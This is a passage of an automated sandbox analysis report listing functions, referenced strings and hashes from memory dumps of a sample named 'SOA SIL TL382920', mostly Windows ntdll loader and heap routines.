Instruction Fuzzy Hash: 05E06D752042147BDA14EE59EC41F9B33ACEFC9714F00441AF918A7241CA70B911CBB9

Function 0042C6C3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,EEDC285D,?,?,EEDC285D), ref: 0042C6FA

Memory Dump Source

Source File: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SOA SIL TL382920.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b3bb4f04ae8c7a95aa100a9def70feac768cf31b8f53eff9ef6e127b728b6d60
Instruction ID: 61fb26c05c0232af16ed1e21438b20158ecf009510f9f9efad02291a7eabb7db
Opcode Fuzzy Hash: b3bb4f04ae8c7a95aa100a9def70feac768cf31b8f53eff9ef6e127b728b6d60
Instruction Fuzzy Hash: 16E04F356046147BD520BF6AEC41F9B775DDFC5754F404459FA08A7241C7B1B90087E5

Function 01872B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01872B44

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2290f41595eaa0aa2ec07960b8c2149c6fdcca68d2d010cedfe82a59bc787e40
Instruction ID: 4cbb97e6918ddb371779025cfd86135d5835468be2952eda85a1ab37c188bafe
Opcode Fuzzy Hash: 2290f41595eaa0aa2ec07960b8c2149c6fdcca68d2d010cedfe82a59bc787e40
Instruction Fuzzy Hash: 32B09B719014C5C5DE11E76457087177901B7D1701F55C455D2464641F8738D195F275

Non-executed Functions

Function 0182D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 0188A66D
Control Panel\Desktop, xrefs: 0182D3FD
@, xrefs: 0182D603
PreferredUILanguages, xrefs: 0182D458, 0182D465
@, xrefs: 0182D43D
Control Panel\Desktop\MuiCached, xrefs: 0182D5CB
MachinePreferredUILanguages, xrefs: 0182D625
@, xrefs: 0182D389
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0182D356

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 5819aa8dc8b0168062ffbf17728b0678ce97219cc6badd3976b5d8303981505d
Instruction ID: 28e81cd3ca3775a3fbed9790be0d99d6b94430c3c3a49240aaebba6a0f1d14d2
Opcode Fuzzy Hash: 5819aa8dc8b0168062ffbf17728b0678ce97219cc6badd3976b5d8303981505d
Instruction Fuzzy Hash: 18B19E725083669FC726DF58C580A5FBBE8BF84718F054A2EF985D7240D770DA88CB92

Function 0182D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 0182D24F
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0182D202
Control Panel\Desktop\LanguageConfiguration, xrefs: 0182D136
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0182D0E6
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0182D263
@, xrefs: 0182D2B3
@, xrefs: 0182D09D
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0182D06F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: beb3093a1f30380c601b212d61d0ca301182a7e395c51e2eb35eaabe0bcd5466
Instruction ID: 9b1ab132d2ae0b14df7c3e72e2ab90aa235868c087d4157ccd59a9a6e1e0ebc8
Opcode Fuzzy Hash: beb3093a1f30380c601b212d61d0ca301182a7e395c51e2eb35eaabe0bcd5466
Instruction Fuzzy Hash: 24A18C715087169FD322DF58C480B9BFBE8AB84715F104A2EFA88D7281D774DA48CB93

Function 018DF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 018DF6B2
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 018DF664
HEAP[%wZ]: , xrefs: 018DF552, 018DF597, 018DF5E3, 018DF648, 018DF696, 018DF6DD
Specified HeapBase (%p) is free or not writable, xrefs: 018DF6F8
Invalid CommitSize parameter - %Ix, xrefs: 018DF5B2
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 018DF5FB
HEAP: , xrefs: 018DF55F, 018DF5A4, 018DF5F0, 018DF655, 018DF6A3, 018DF6EA
Invalid ReserveSize parameter - %Ix, xrefs: 018DF56B

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: f6f5851ec87285e2a8630fd1b4d213ab039eca7b52539f6acda3de02cef57e90
Instruction ID: 1985739df452b2ac09163ad140b7298ae8170d3b6e664af9ef0c920581bbc1c6
Opcode Fuzzy Hash: f6f5851ec87285e2a8630fd1b4d213ab039eca7b52539f6acda3de02cef57e90
Instruction Fuzzy Hash: FF514432211399EFC712DF68D885E5A77B4EF04B24F048419F602EB751C679DB81DA21

Function 0183E9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

, xrefs: 0183F1B9
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0183EA78
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0183EA8C
{, xrefs: 01894447
T, xrefs: 0183EA6E
R, xrefs: 0183EA82

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 40288a1117d48530e86de9a1027b6c93ef7efc9ba7c3288e4bc18b5aa96a383d
Instruction ID: c61562c671d74db2246b0f0e19b25fe0f291741fda629a10c0caf256043fb52c
Opcode Fuzzy Hash: 40288a1117d48530e86de9a1027b6c93ef7efc9ba7c3288e4bc18b5aa96a383d
Instruction Fuzzy Hash: 09A22870E0562A8BDF65DF18C9987ADBBB5AF84304F1842E9D909E7250DB319F81CF81

Function 0184B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 01898209
minkernel\ntdll\ldrutil.c, xrefs: 0189821A, 018982EE
SxS, xrefs: 018981FA
API set, xrefs: 01898201, 01898206
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 018982DD
LdrpPreprocessDllName, xrefs: 01898210, 018982E4

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 71e067de4a0f5fb4639835bd8d3e3a7e09db150de2585138937ed997bf97693c
Instruction ID: 45fdc425994bbfb3524cecb5069f1f228da2bab7a0a29b64730f68ba6131e19d
Opcode Fuzzy Hash: 71e067de4a0f5fb4639835bd8d3e3a7e09db150de2585138937ed997bf97693c
Instruction Fuzzy Hash: 21C12531A0061E9BDF258B6DC881BBEBBA5AF56704F184069ED02DB291EF74DF44C391

Function 018DF0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 018DF389
RtlAllocateHeap, xrefs: 018DF0ED
HEAP[%wZ]: , xrefs: 018DF267, 018DF314, 018DF36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 018DF33E
HEAP: , xrefs: 018DF274, 018DF321, 018DF378
Just allocated block at %p for %Ix bytes, xrefs: 018DF288

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 8acfe3f916338112867ce40e89fd034f7ca8bcb3a6b74220ee1d45b61da4cf2c
Instruction ID: aa824cdfd4f776230ec10efca556fc6885543f54e5126ddfdfd99dfde7e06230
Opcode Fuzzy Hash: 8acfe3f916338112867ce40e89fd034f7ca8bcb3a6b74220ee1d45b61da4cf2c
Instruction Fuzzy Hash: AE910131A007499FDB26DFA8C840AADBBF1FF59314F148009EA42EB351CB759B42DB11

Function 0182640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018897B9
apphelp.dll, xrefs: 01826446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01889790
minkernel\ntdll\ldrinit.c, xrefs: 018897A0, 018897C9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0188977C
LdrpInitShimEngine, xrefs: 01889783, 01889796, 018897BF

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: a49eb34e867548ac08e9cc0d650f267aa670a87dcdf8e6dab89799151a7a4a22
Instruction ID: 4a9999088daa2d845af0d3362010a2f3b844d42bc5868d3ffd867ce9bdaeba97
Opcode Fuzzy Hash: a49eb34e867548ac08e9cc0d650f267aa670a87dcdf8e6dab89799151a7a4a22
Instruction Fuzzy Hash: 8A51BF716083059FE321EF28D891A6B77E9FF84708F10091DF985D7264EA34DB44CB92

Function 01862594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018A1FA9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018A1F82
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018A1FC9
SXS: %s() passed the empty activation context, xrefs: 018A1F6F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018A1F8A
RtlGetAssemblyStorageRoot, xrefs: 018A1F6A, 018A1FA4, 018A1FC4

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 25fc0e080e1af3896571459f22eaaecc468f46934077a99ee32d34849e0f82fb
Instruction ID: 77e5a464ee999ed2842b89943a5fd020c56fb9b3e8195b88fa5e28604fb2b662
Opcode Fuzzy Hash: 25fc0e080e1af3896571459f22eaaecc468f46934077a99ee32d34849e0f82fb
Instruction Fuzzy Hash: BF310872B002597BFB218A8A9C89F9B7A6D9B60B54F04409DBA01F7345D370EF01C7E5

Function 0185510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01855272
Kernel-MUI-Language-Allowed, xrefs: 0185519B
Kernel-MUI-Number-Allowed, xrefs: 01855167
WindowsExcludedProcs, xrefs: 0185514A
Kernel-MUI-Language-SKU, xrefs: 0185534B

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 4a04f133474de29dd64d93d3a1b70a2667350adac73efd448d9f6d96de719cbd
Instruction ID: 4d256cd58e7155253f5db6ae0f99967f21945dd8273103a5fbc371f990184f12
Opcode Fuzzy Hash: 4a04f133474de29dd64d93d3a1b70a2667350adac73efd448d9f6d96de719cbd
Instruction Fuzzy Hash: 3CF11C72D01219EFCF51DF99D980EEEBBB8FF18750F14405AE905E7250EA749B018BA1

Function 0185D6D0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

LdrShutdownProcess, xrefs: 0189F0D8
minkernel\ntdll\ldrinit.c, xrefs: 0189F0E2
Process 0x%p (%wZ) exiting, xrefs: 0189F0D1
$, xrefs: 0185D78D
$, xrefs: 0185D820

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 0b7d3fd7d3faae066e3065cf0dfa62151c9d75fff65a9a990a4edb65ec2b1218
Instruction ID: 1d7536a7cfe18195e72ea617f8c7ffd8e3ce35f1a87524ffbd4b3bb4a4466282
Opcode Fuzzy Hash: 0b7d3fd7d3faae066e3065cf0dfa62151c9d75fff65a9a990a4edb65ec2b1218
Instruction Fuzzy Hash: 65510071A0838A9FEB64DFE8C48479DBBB1FF44318F244259CD05EB281D774AA81CB81

Function 018BF9AA Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

SR - , xrefs: 018BFA22
Item:, xrefs: 018BF9FA
Language:, xrefs: 018BF9EB
Type:, xrefs: 018BF9C3
Name:, xrefs: 018BF9DC

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Item:$ Language:$ Name:$SR - $Type:
API String ID: 0-3082644519
Opcode ID: 3332fe368466986c20bb488ca8b5cad31c9e5bb60b5921420c85e6f3860e3a36
Instruction ID: e3837217bd0205ea76c63132638f5a35a6e2d2e823685298f70619aefae08f5e
Opcode Fuzzy Hash: 3332fe368466986c20bb488ca8b5cad31c9e5bb60b5921420c85e6f3860e3a36
Instruction Fuzzy Hash: 3B419371A002299FDB24DB69CC98BDABBBCAF55304F0441D9E648E7250DE349F84CF92

Function 01827662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

, passed to %s, xrefs: 0188ADCF
RtlFreeHeap, xrefs: 0188ADCE
HEAP[%wZ]: , xrefs: 0188ADA5
HEAP: , xrefs: 0188ADB2
Invalid heap signature for heap at %p, xrefs: 0188ADBE

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: a58981718ee96af2269824547294db88ccd7c1e29d24c278af8366b47e263aea
Instruction ID: bd2312d515422fadc656f7814b639ccc9b531ea3550eac3081d56bba9b698c9b
Opcode Fuzzy Hash: a58981718ee96af2269824547294db88ccd7c1e29d24c278af8366b47e263aea
Instruction Fuzzy Hash: 4D014C36215264AFE32BAB2DE849F527B94DB41B30F14444EE040C77D1DA999B80D661

Function 0183A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0183A317
8, xrefs: 0183A307
LdrResFallbackLangList Exit, xrefs: 0183A31F
LdrResFallbackLangList Enter, xrefs: 0183A30F

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 2cce42d492ac424cc10f14fae18328e42e37d3f00a0793eb620adbf28eccb735
Instruction ID: 4a889c1710847b8d0744077dfc88d7b5a5fa67144d0c85b7d53dab3752fb062a
Opcode Fuzzy Hash: 2cce42d492ac424cc10f14fae18328e42e37d3f00a0793eb620adbf28eccb735
Instruction Fuzzy Hash: 5BC19C71108386CFDB19DF58C080B6AB7E5BF84708F08496AF9C6DB291E374CA45CB96

Function 0186265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018A20C0
.Local, xrefs: 018627F8
SXS: %s() passed the empty activation context, xrefs: 018A1FE8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018A1FE3, 018A20BB

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: a6270e760bb55ad5cbe132a6fb85e989fa74781c769f8755c78198a9b1f679cd
Instruction ID: 6ecf04eb9293bbe091d229dbb207321d97f3629144a73a0485164a6d1d0f095e
Opcode Fuzzy Hash: a6270e760bb55ad5cbe132a6fb85e989fa74781c769f8755c78198a9b1f679cd
Instruction Fuzzy Hash: 2BA19F3194022E9BDB25CF68DC88BA9B7BABF58314F1405E9E908E7251D7309F85CF91

Function 018363CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01890EB5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01890E2F
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01890E72
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01890DEC

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: f0fefd6aece4dc9ff7f05490b4a4285b4809751a208e87399a450e7403bc5a7a
Instruction ID: 8171d30da17b21d75ac3a4b2b8dfbf0ac5ddd6ed74a9d38cbfff733207d644a7
Opcode Fuzzy Hash: f0fefd6aece4dc9ff7f05490b4a4285b4809751a208e87399a450e7403bc5a7a
Instruction Fuzzy Hash: 5371CF71904305AFCB61EF18C8C4B9B7BA9AF95764F540468F949CA246E334E788CBD2

Function 0182F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0188E18D
`, xrefs: 0188E1B7
HEAP: , xrefs: 0188E2DD
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0188E2F2

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 4bd98b754ddd02276ee870fcb0965aa340710c8ce6602f66c2e35ff7da6550bf
Instruction ID: dd7e3997ca108847ccc62ffabdbf020544cf6c7ea8c6f101acfdf82cac036088
Opcode Fuzzy Hash: 4bd98b754ddd02276ee870fcb0965aa340710c8ce6602f66c2e35ff7da6550bf
Instruction Fuzzy Hash: E8610231204795AFE322EB68C844F67BBE9EF84B54F040459FA55DB292D734EA40CB62

Function 0185237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01852382
LdrpDynamicShimModule, xrefs: 0189A7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0189A79F
minkernel\ntdll\ldrinit.c, xrefs: 0189A7AF

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: f742b73fa1fac9ff25f465063d7541f0da84e07610b78667567df8d66cb9a371
Instruction ID: 252e27c78c062bef9c6d48db6fa6a2a20b718d6b62d824d516195f472a1b8880
Opcode Fuzzy Hash: f742b73fa1fac9ff25f465063d7541f0da84e07610b78667567df8d66cb9a371
Instruction Fuzzy Hash: 45312672A04201EBEF35AF2DD885AAE77B5FB84B04F18005DED01EB255DBB45B41CB91

Function 018290F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 0188B82F, 0188B86C
HEAP: , xrefs: 0188B83C, 0188B879
VirtualQuery Failed 0x%p %x, xrefs: 0188B886
VirtualProtect Failed 0x%p %x, xrefs: 0188B849

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 2994545307-1391187441
Opcode ID: 3f3b667b014088bca3737dd03f582eb9f7bcf24f2880ea3aafa2aa30c312e551
Instruction ID: cadb06e80c899af3fd6da82019a5c69574432d2dd05e964cee61639ff4d1a36e
Opcode Fuzzy Hash: 3f3b667b014088bca3737dd03f582eb9f7bcf24f2880ea3aafa2aa30c312e551
Instruction Fuzzy Hash: 6E31F432A10129EFCB12EB59CC85F9AB7B8EF45764F244069F514E7391D734EB80CA61

Function 018D9060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 018D9776
, xrefs: 018D9704
, xrefs: 018D9657

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 41e2b35c21fe77f0d06685c4db148d3e40dbb74908cbcf357f6732f204f9936f
Instruction ID: 477c93e03aa3d854a9891a10351e4c010820916897a9244ce14660160bf8f282
Opcode Fuzzy Hash: 41e2b35c21fe77f0d06685c4db148d3e40dbb74908cbcf357f6732f204f9936f
Instruction Fuzzy Hash: 573204B1A083819FD360CF68C484B5BBBE5BF88748F04492EF599C7251D775EA48CB52

Function 01840680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01894EBB
(UCRBlock->Size >= *Size), xrefs: 01894ED7
HEAP: , xrefs: 01894ECA

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: efa9cb5494e6dad48f4f64b7b9583ba7d186dd06e46c1751d598581442a978e3
Instruction ID: 8355c2a0577a62b9163d5ff0753f526d4a98ff78cef88ac19adb3e46cac29a60
Opcode Fuzzy Hash: efa9cb5494e6dad48f4f64b7b9583ba7d186dd06e46c1751d598581442a978e3
Instruction Fuzzy Hash: D1F18070A0060ADFEB15CF68C994BAAB7F5FF44304F144159E616DB381DB34EA81CB91

Function 01831380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01831648
HEAP[%wZ]: , xrefs: 01831632
HEAP: , xrefs: 018314B6

Memory Dump Source

Source File: 00000002.00000002.21276030785.0000000001800000.00000040.00001000.00020000.00000000.sdmp, Offset: 01800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1800000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: f6defecbe12ff3539e214919ece75830a6b1921c06bff45a29bf4e9552072b49
Instruction ID: 11af2aaf69cb2dd686b0bf1761ab8ff0570736a64b1cd2f6de2af540bef3b3a7
Opcode Fuzzy Hash: f6defecbe12ff3539e214919ece75830a6b1921c06bff45a29bf4e9552072b49
Instruction Fuzzy Hash: 0DE1E270A046459FDB29CF6CC49977ABBF1EF88704F18885DE596CB286E734DA40CB90

Function 0185F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018A00F1
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018A00C7
RTL: Re-Waiting, xrefs: 018A0128

Memory Dump Source

